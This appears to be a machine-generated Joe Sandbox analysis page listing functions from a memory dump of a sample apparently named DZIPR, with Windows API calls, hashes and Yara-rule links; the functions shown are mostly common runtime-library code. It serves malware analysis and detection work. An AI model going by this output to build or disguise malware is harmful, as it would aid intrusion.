Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
String ID:
API String ID: 4273134663-0
Opcode ID: b396342c781428252882fb16517920e21d9f2d19207cac0dac9c7938305f7d36
Instruction ID: be6fca0c643df823e31505d08d07b5e1958bda236b1bd9bceaaf59123d5ea64f
Opcode Fuzzy Hash: b396342c781428252882fb16517920e21d9f2d19207cac0dac9c7938305f7d36
Instruction Fuzzy Hash: 0E01C0B660921DA7CB11EAB48C89DDBB3BDEF45744F104066E919D3B01EB34DA0887A0

Function 6C92FE0E Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 6C92FE1A

Part of subcall function 6C92A27F: __getptd_noexit.LIBCMT ref: 6C92A282
Part of subcall function 6C92A27F: __amsg_exit.LIBCMT ref: 6C92A28F

__amsg_exit.LIBCMT ref: 6C92FE3A
__lock.LIBCMT ref: 6C92FE4A
InterlockedDecrement.KERNEL32(?), ref: 6C92FE67
InterlockedIncrement.KERNEL32(00E02908), ref: 6C92FE92

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
String ID:
API String ID: 4271482742-0
Opcode ID: 3d3dd8138d689b5880ef5513a9ad9372656d100fff5825f8c456aefc19dfea3c
Instruction ID: 053065da7eef22ee8c4b840c4a84a05911c9afc37c844fcf61355fd4050834f6
Opcode Fuzzy Hash: 3d3dd8138d689b5880ef5513a9ad9372656d100fff5825f8c456aefc19dfea3c
Instruction Fuzzy Hash: 8901FE32A16B359BDB12AB65840479D7374BF2572CF200209E494A7F58C73CE945CBD5

Function 6C91DB5C Relevance: 7.5, APIs: 5, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 6C91DB6D
GetDlgCtrlID.USER32(00000000), ref: 6C91DB81
GetWindowRect.USER32(00000000,?), ref: 6C91DBA3
PtInRect.USER32(?,?,?), ref: 6C91DBB3
GetWindow.USER32(?,00000005), ref: 6C91DBC0

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: RectWindow$ClientCtrlScreen
String ID:
API String ID: 4072766398-0
Opcode ID: ad962f59353c216d1afe41e179c9c59f9e3a056e3e4c6b545f167a0d1930f585
Instruction ID: 9fad891f9d0310c04f6e66eb63997c6b68c62471bc34943eb1ee124cecc1c92a
Opcode Fuzzy Hash: ad962f59353c216d1afe41e179c9c59f9e3a056e3e4c6b545f167a0d1930f585
Instruction Fuzzy Hash: B901A23224802DBBCF225B558C09E9F3B7CFF42350F104122F926DAA80D734D601CB98

Function 6C924618 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 6C924636

Part of subcall function 6C92A914: __mtinitlocknum.LIBCMT ref: 6C92A92A
Part of subcall function 6C92A914: __amsg_exit.LIBCMT ref: 6C92A936
Part of subcall function 6C92A914: RtlEnterCriticalSection.NTDLL(00000000), ref: 6C92A93E

___sbh_find_block.LIBCMT ref: 6C924641
___sbh_free_block.LIBCMT ref: 6C924650
HeapFree.KERNEL32(00000000,00000000,6C93E828,0000000C,6C92A270,00000000,?,6C92A5D4,00000000,00000001,00000000,?,6C92A89E,00000018,6C93E978,0000000C), ref: 6C924680
GetLastError.KERNEL32(?,6C92A5D4,00000000,00000001,00000000,?,6C92A89E,00000018,6C93E978,0000000C,6C92A92F,00000000,00000000,?,6C92A32A,0000000D), ref: 6C924691

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
String ID:
API String ID: 2714421763-0
Opcode ID: 904df57df9561c4ab717923bc168f39cea9290b0b63e9b35cac6025d6b06e29c
Instruction ID: 2a45c828e029a07cec60005384078cf4b42bef646f3a557daaa749c30b362255
Opcode Fuzzy Hash: 904df57df9561c4ab717923bc168f39cea9290b0b63e9b35cac6025d6b06e29c
Instruction Fuzzy Hash: DC01A232925725EBDF245FB19808F9E3B789F21329F204509E094AAA88CB3DD5449E98

Function 6C91C113 Relevance: 7.5, APIs: 5, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

TlsFree.KERNEL32(?,?,?,6C91C179), ref: 6C91C13B
GlobalHandle.KERNEL32(?), ref: 6C91C149
GlobalUnlock.KERNEL32(00000000), ref: 6C91C152
GlobalFree.KERNEL32(00000000), ref: 6C91C159
RtlDeleteCriticalSection.NTDLL ref: 6C91C163

Part of subcall function 6C91BF5D: RtlEnterCriticalSection.NTDLL(?), ref: 6C91BFBC
Part of subcall function 6C91BF5D: RtlLeaveCriticalSection.NTDLL(?), ref: 6C91BFCC
Part of subcall function 6C91BF5D: LocalFree.KERNEL32(?), ref: 6C91BFD5
Part of subcall function 6C91BF5D: TlsSetValue.KERNEL32(?,00000000), ref: 6C91BFE7

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
String ID:
API String ID: 1549993015-0
Opcode ID: 2d2a78339d56c7ad5472f2f090944904353471f41ef50c3fa98355fbed9f8b34
Instruction ID: af360507bd5d676b45eca4ea1d147de2cb6af01783d94485b4e7d81620e98316
Opcode Fuzzy Hash: 2d2a78339d56c7ad5472f2f090944904353471f41ef50c3fa98355fbed9f8b34
Instruction Fuzzy Hash: 53F054363096009BDB256B789C49E1B36BD9F86774735061AF529D3B41CB30D9038768

Function 6C9196DA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 6C9196F2
_memset.LIBCMT ref: 6C91976A
LoadBitmapW.USER32(00000000,00007FE3), ref: 6C9197E5

Strings

, xrefs: 6C91974B

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: BitmapCheckDimensionsLoadMarkMenu_memset
String ID:
API String ID: 3130454499-3916222277
Opcode ID: 5d694ac8034b53d1085788f6afbf0b5f51e8ae87368c1bf3db6e95c2749abfb4
Instruction ID: 4c5ec0318dc31ec61609b0467639a12945f856af714de5439049992e966fee37
Opcode Fuzzy Hash: 5d694ac8034b53d1085788f6afbf0b5f51e8ae87368c1bf3db6e95c2749abfb4
Instruction Fuzzy Hash: 04314971B042189BEF248F389CC5BA97BB8FF45708F5580A7E549DB680DB30C9498F50

Function 6C92140F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C91C220: RtlEnterCriticalSection.NTDLL(6C9434A8), ref: 6C91C25A
Part of subcall function 6C91C220: RtlInitializeCriticalSection.NTDLL(?), ref: 6C91C26C
Part of subcall function 6C91C220: RtlLeaveCriticalSection.NTDLL(6C9434A8), ref: 6C91C279
Part of subcall function 6C91C220: RtlEnterCriticalSection.NTDLL(?), ref: 6C91C289

Part of subcall function 6C91BB0C: __EH_prolog3_catch.LIBCMT ref: 6C91BB13

Part of subcall function 6C916DC1: __CxxThrowException@8.LIBCMT ref: 6C916DD7
Part of subcall function 6C916DC1: __EH_prolog3.LIBCMT ref: 6C916DE4

GetProcAddress.KERNEL32(00000000,HtmlHelpW), ref: 6C921458
FreeLibrary.KERNEL32(?), ref: 6C921468

Strings

HtmlHelpW, xrefs: 6C921452
hhctrl.ocx, xrefs: 6C92143C

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpW$hhctrl.ocx
API String ID: 2853499158-3773518134
Opcode ID: 672d6d0eee22fc4bc81ccb7d68da32371b2fc3f0b3d72eab7a28526987ab14e7
Instruction ID: 065f88086550a4a448bd0dca7fb1341c269050cae1e0c7639d7536ef3f10cf16
Opcode Fuzzy Hash: 672d6d0eee22fc4bc81ccb7d68da32371b2fc3f0b3d72eab7a28526987ab14e7
Instruction Fuzzy Hash: 4801263150871AA7CB211BA5CC05B873BB5AF11359F00C926F48E95D50CB35D820D651

Function 6C92C7C3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 6C92C7D6

Part of subcall function 6C92C731: ___BuildCatchObjectHelper.LIBCMT ref: 6C92C767

_UnwindNestedFrames.LIBCMT ref: 6C92C7ED
___FrameUnwindToState.LIBCMT ref: 6C92C7FB

Strings

csm, xrefs: 6C92C7D2, 6C92C7E7, 6C92C7FA, 6C92C818, 6C92C828

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm
API String ID: 2163707966-1018135373
Opcode ID: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
Instruction ID: b2005771d9ca817167a045fe31111b5e3c1b5a7dff6dff206875d9a048907665
Opcode Fuzzy Hash: 9333c40b5dfdbc582cc92e6f10fbdaaaf62e4115b5764113ccc931296aa917a4
Instruction Fuzzy Hash: 6901F632011109BBEF126F51CC44EEA7F6AFF28358F104010FD9855A28D77AD9B1EBA1

Function 6C92ED77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(KERNEL32,6C9277D7), ref: 6C92ED7C
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 6C92ED8C

Strings

KERNEL32, xrefs: 6C92ED77
IsProcessorFeaturePresent, xrefs: 6C92ED86

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: IsProcessorFeaturePresent$KERNEL32
API String ID: 1646373207-3105848591
Opcode ID: b53afd71369b934234e6c2e1b038d36e7d0bf160942bed28c87db752c55c5016
Instruction ID: 9ecd6f295f4969f915359191dfc63b85f7ef16a4e279ba8f0141f354af2a3610
Opcode Fuzzy Hash: b53afd71369b934234e6c2e1b038d36e7d0bf160942bed28c87db752c55c5016
Instruction Fuzzy Hash: F7F03030A14A09D2EF101FF1AD5D66F7A79FB82746F920990E1D9E0488DF34C0B49289

Function 6C917D71 Relevance: 6.1, APIs: 4, Instructions: 131timeCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 6C917D88
GetFileTime.KERNEL32(?,?,?,?), ref: 6C917DBF
GetFileSizeEx.KERNEL32(?,?), ref: 6C917DD7

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: File$SizeTime_memset
String ID:
API String ID: 151880914-0
Opcode ID: 1b86f5f45fe89c964d50170b84883a064cd64cd89e46ea6d5bac6056b8c5852c
Instruction ID: fa7fdce996b04148771a9d4787754374cbe9e5635dba8e6c7fdeedd8ac2efa7d
Opcode Fuzzy Hash: 1b86f5f45fe89c964d50170b84883a064cd64cd89e46ea6d5bac6056b8c5852c
Instruction Fuzzy Hash: 4C511D7550860A9FDB24CF68C941D9AB7F8FF19324B104A1EE4AAD3E90E730F944CB60

Function 6C93081B Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 6C93084F
__isleadbyte_l.LIBCMT ref: 6C930883
MultiByteToWideChar.KERNEL32(00000080,00000009,6C9240D8,6C93BF84,00000000,00000000,?,?,?,?,6C9240D8,00000000,?), ref: 6C9308B4
MultiByteToWideChar.KERNEL32(00000080,00000009,6C9240D8,00000001,00000000,00000000,?,?,?,?,6C9240D8,00000000,?), ref: 6C930922

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 08e394900b1d7c478792346d74cd5a48c04403da08b722898d79a0c4e83d8773
Instruction ID: 368628033677e6d873531694243d9ad97007395990739c34f573059b3444e543
Opcode Fuzzy Hash: 08e394900b1d7c478792346d74cd5a48c04403da08b722898d79a0c4e83d8773
Instruction Fuzzy Hash: C031E531A052E9EFDB00CF64C880AAE7BB9FF01314F1465E9E86C9B591DB32D941DB90

Function 6C9188C8 Relevance: 6.1, APIs: 4, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 6C9188E7
lstrcmpW.KERNEL32(00000000,?), ref: 6C9188F4
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6C91892E
GlobalLock.KERNEL32(00000000), ref: 6C918938

Part of subcall function 6C91DAD1: GlobalFlags.KERNEL32(?), ref: 6C91DAE0
Part of subcall function 6C91DAD1: GlobalUnlock.KERNEL32(?), ref: 6C91DAF2
Part of subcall function 6C91DAD1: GlobalFree.KERNEL32(?), ref: 6C91DAFD

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: Global$Lock$AllocFlagsFreeUnlocklstrcmp
String ID:
API String ID: 2391069079-0
Opcode ID: 96d87e3ed64bfe298746a170ec9025410af96d6bd61172ca5935e9ef0b763fe9
Instruction ID: d062b71f594ed351d9a7a3dcdfb045b4201216f452fa2551e44c00e54fb734e0
Opcode Fuzzy Hash: 96d87e3ed64bfe298746a170ec9025410af96d6bd61172ca5935e9ef0b763fe9
Instruction Fuzzy Hash: 8411A372508608BFCF229BA5CC49CAF7BFDFB99B44761041AFA05D2920D731D900E724

Function 6C91BF5D Relevance: 6.1, APIs: 4, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEnterCriticalSection.NTDLL(?), ref: 6C91BFBC
RtlLeaveCriticalSection.NTDLL(?), ref: 6C91BFCC
LocalFree.KERNEL32(?), ref: 6C91BFD5
TlsSetValue.KERNEL32(?,00000000), ref: 6C91BFE7

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: CriticalSection$EnterFreeLeaveLocalValue
String ID:
API String ID: 2949335588-0
Opcode ID: b47447b30555c4a1ddce00d8c8ab396fcb7a1f9cd76d5445322e7e08e6df6f67
Instruction ID: 57463212be4ea3e7f906f9f959b5c69c6ef664f01489295b8339349bc77e186d
Opcode Fuzzy Hash: b47447b30555c4a1ddce00d8c8ab396fcb7a1f9cd76d5445322e7e08e6df6f67
Instruction Fuzzy Hash: 3C1156B1605208AFD7149F64C885B5AB7BAEB46319F20842AF1568BAA1CB70E960CF50

Function 6C918EC9 Relevance: 6.1, APIs: 4, Instructions: 57threadCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C918ED0

Part of subcall function 6C919C7C: __EH_prolog3.LIBCMT ref: 6C919C83

__wcsdup.LIBCMT ref: 6C918EF2
GetCurrentThread.KERNEL32 ref: 6C918F1F
GetCurrentThreadId.KERNEL32 ref: 6C918F28

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: CurrentH_prolog3Thread$__wcsdup
String ID:
API String ID: 190065205-0
Opcode ID: 63497b69dfd9ffb4992272e94c2949303ec71429b614fe1d20eb9ba80bc97190
Instruction ID: b422141e9f407a4de6ae3ff2c1fa016587cd5d64bb2d762b7a3c8c336b4df52a
Opcode Fuzzy Hash: 63497b69dfd9ffb4992272e94c2949303ec71429b614fe1d20eb9ba80bc97190
Instruction Fuzzy Hash: CC219BB0905B548FC7259F7A854628AFAF8BFA4704F20891FD1AAC7B25CBB0E144DF44

Function 6C921D07 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C921D33
SendMessageW.USER32(?,0000001F,00000000,00000000), ref: 6C921D5E
GetCapture.USER32 ref: 6C921D70
SendMessageW.USER32(00000000,0000001F,00000000,00000000), ref: 6C921D7F

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: MessageSend$Capture
String ID:
API String ID: 1665607226-0
Opcode ID: ed08588cc6570b3390daa99ff2e99857d532ccb6ee84b6b878386c5ada8b1b4b
Instruction ID: 5d11f578c298abf5e3e8d94fcdee5c595f0bca3da182d6d671aebf8f281e9356
Opcode Fuzzy Hash: ed08588cc6570b3390daa99ff2e99857d532ccb6ee84b6b878386c5ada8b1b4b
Instruction Fuzzy Hash: CF0171313602947BDF301B628CCDFDB3E7ADFCAB10F110079B6459A1AACAA5C814D660

Function 6C91D159 Relevance: 6.1, APIs: 4, Instructions: 56registryCOMMON

Download Yara Rule

APIs

RegSetValueExW.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 6C91D194
RegCloseKey.ADVAPI32(00000000), ref: 6C91D19D
swprintf.LIBCMT ref: 6C91D1BA
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 6C91D1CB

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: ClosePrivateProfileStringValueWriteswprintf
String ID:
API String ID: 22681860-0
Opcode ID: a1b914d72d65d8a34d9383d87dd8156d68c26448274ca5edf810f3e1d9fa82ee
Instruction ID: ead0bd43f0c59dbcea8cc42a2770b7b17ef3fbb7152fe065110627e1d5ebf339
Opcode Fuzzy Hash: a1b914d72d65d8a34d9383d87dd8156d68c26448274ca5edf810f3e1d9fa82ee
Instruction Fuzzy Hash: C301AD7260020CABDB159A648C86FAB77BCAF4A718F10041AF901E7640DB74EA1487A4

Function 6C916A83 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6C916A8A

Part of subcall function 6C9168E2: _malloc.LIBCMT ref: 6C916900

__CxxThrowException@8.LIBCMT ref: 6C916AC0
FormatMessageW.KERNEL32(00001100,00000000,?,00000800,6C9116A6,00000000,00000000,?,?,6C93D898,00000004,6C9116A6,00000000,6C9169F9,00000000), ref: 6C916AEA
LocalFree.KERNEL32(6C9116A6,6C9116A6,00000000,6C9169F9,00000000), ref: 6C916B12

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc
String ID:
API String ID: 1776251131-0
Opcode ID: 9d3b5b83b12800874c7fb93a4bbbeabab3fe5453b95e3262af37ce4b7f753f68
Instruction ID: 27d48a34c63b557e411edf259fe7543ac9819982d41443ef870e0bae863a8cc7
Opcode Fuzzy Hash: 9d3b5b83b12800874c7fb93a4bbbeabab3fe5453b95e3262af37ce4b7f753f68
Instruction Fuzzy Hash: 89119171A48249AFDF04CF68CC419AE37B5EF58314F20C529F929CBA90E731D510CB54

Function 6C917287 Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 6C9168E2: _malloc.LIBCMT ref: 6C916900

GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 6C9172BB
GetCurrentProcess.KERNEL32(?,00000000), ref: 6C9172C1
DuplicateHandle.KERNEL32(00000000), ref: 6C9172C4
GetLastError.KERNEL32(?), ref: 6C9172DF

Memory Dump Source

Source File: 0000000D.00000002.1454616012.000000006C911000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C910000, based on PE: true

Associated: 0000000D.00000002.1454595464.000000006C910000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454720496.000000006C938000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C941000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000D.00000002.1454754136.000000006C945000.00000004.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6c910000_DZIPR.jbxd

Similarity

API ID: CurrentProcess$DuplicateErrorHandleLast_malloc
String ID:
API String ID: 3704204646-0
Opcode ID: f731b1095bc78a00a3f24d44dffe3f4818e611650ff866dd9b39410ad260c956
Instruction ID: 725b4c96332a81af2f9afcf291380742d0dd5da98f6e955e1608881627c68278
